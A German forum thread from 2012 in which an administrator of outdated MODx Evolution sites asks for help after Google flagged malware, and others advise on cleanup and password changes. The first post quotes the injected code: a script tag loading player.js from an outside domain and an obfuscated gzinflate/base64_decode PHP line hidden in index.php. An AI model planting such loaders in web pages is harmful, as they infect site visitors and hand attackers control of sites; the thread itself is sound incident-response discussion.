Vanilla 1.1.2 Forum von Lussumo. Weitere Informationen: Dokumentation, Community.

MODx Evolution (Versionen 0.9x -> 1.x) allgemein: Sicherheitsproblem 1.03 - index.php

Ende der Seite

1 bis 4 von 4

  1.  
    • CommentAuthortseng
    • CommentTime04.05.2012
     permalink
    Naabend zusammen!

    Ich verwende auf einer recht abgespeckten Seite Evo 1.03.

    Nun bekam ich Meldung von Google, dass sich auf der Seite Malware versteckt. Ganz unten auf jeder Seite findet sich im Quelltext:

    <script type="text/javascript" src="http://rec-creations.com/player.js"></script>

    In meiner index.php auf dem Server findet sich ebenfalls ganz unten:

    #b58b6f#
    echo(gzinflate(base64_decode("JcsxCoAwDADAr5TsNrvY/iWEgC1qQxLE/t6h68EdztY0UkyVAiFfYKeXlkJy4wJnhO6IJryxCUUbj2ceN+pFUyx3h3rgKvUH")));
    #/b58b6f#

    Blöderweise ist das gleich bei drei unterschiedlichen Seiten auf unterschiedlichen Servern der Fall ..

    Nun die Frage:

    Die Modx-Version ist zu alt, das habe ich auch gerade festgestellt. Wurde modx auf dem Server kompromitiert oder besteht die Gefahr, dass mein Rechner zu Hause verseucht ist und jemand mit einem Keylogger mich überwacht hat?

    Beunruhigte Grüße! & schon mal Danke für eine Antwort!
    •  
      CommentAuthorManfred62
    • CommentTime04.05.2012
     permalink
    Kann beides sein. Welche Gemeinsamkeit besteht hier? Dort wird die Quelle sein.
    Blöderweise ist das gleich bei drei unterschiedlichen Seiten auf unterschiedlichen Servern der Fall ..


    Zumindest bist du nicht allein...
    http://www.google.de/search?q=rec-creations.com%2Fplayer.js

    Von einem anderen (sauberen) Rechner aus alle Passwörter ändern!!
    Danach die Dateien bereinigen. Weitere Tipps:
    http://www.modxcms.de/forum/comments.php?DiscussionID=5551#Item_2
    • CommentAuthortseng
    • CommentTime04.05.2012
     permalink
    Nachtrag:

    Eine weitere Seite, die ich mal betreut und dann abgegeben hatte ist dann unter dem neuen Betreuer unter 0.9? stehen geblieben und ebenfalls betroffen ..

    Eine aktuelle, von außen zwar zugänglich, aber nicht sichtbare Joomlaseite ist nicht betroffen .. deswegen gehe ich eher mal nicht von einem Keylogger aus ..

    Dann würde es sich ja mit einem Update auf die aktuelle Evo erledigen, oder? Gibt es eine Möglichkeit herauszufinden ob nicht nur die index.php verändert wurde und evtl. ein Backdoor besteht?

    Grüße!
    • CommentAuthortseng
    • CommentTime04.05.2012 bearbeitet
     permalink
    Danke für die Antwort!

    Die Gemeinsamkeit ist, dass alle Versionen nicht aktuell sind ... angefasst habe ich die Seiten teil. bestimmt seit einem Jahr nicht mehr ..

    wahrscheinlich hat es mit den folgenden Meldungen in den Sicherheitseinstellungen zu tun (Vermutung) .. dies wird mir in der einen Installation im Backend angezeigt:

    MODX Evolution 1.0.5 (and prior) Remote Script Execution Vulnerability - 20-02-2012 11:44:07
    Product: MODX Evolution Risk: Very High Severity: Critical Versions: 1.0.5 and all previous releases Vunerability type: Remote Script Execution* Report Date: 2012-Feb-16 Fixed Date: 2012-Feb-20 Descr...

    MODx Evo 1.0.4 (and prior) SQL Injection and Directory Traversal Vulnerabities - 28-01-2011 09:13:31
    Status: SolvedProduct: MODx EvolutionSeverity: HighVersions: 1.0.4 and priorAdvisory Date: 2011-01-26Fixed Date: 2011-01-19Impact: a) A remote attacker may access or view arbitrary files on the server...

    Critical PHP Bug Security Notice and Patch - 06-01-2011 16:43:30
    Earlier this week, a PHP Security Notice was made due to a critical bug in PHP that could cause PHP to fail should a value of 2.2250738585072011e-308 be set to a PHP value.More information can be foun...

    Diese eine Seite habe ich bei Strato gehostet .. Interessanterweise bekomme ich bei von mir vorgenommen Änderung am nächsten Tag von Strato eine E-Mail welche Dateien geändert worden sind .. dieses Mal wurde mir nichts gezeigt .. Ich schätze mal, das die Infektion min. eine Woche besteht ..

    Ich habe die Änderungen in der index.php manuell teilw. via ftp und in einem Fall im Backend geändert und werde nächste Woche auf die aktuelle Evo updaten und von einem weiteren Rechner die Zugangsdaten ändern, evtl. die Schreibrechte auf der index.php ändern und dann mal beobachten ..

    Grüße!

1 bis 4 von 4

  1.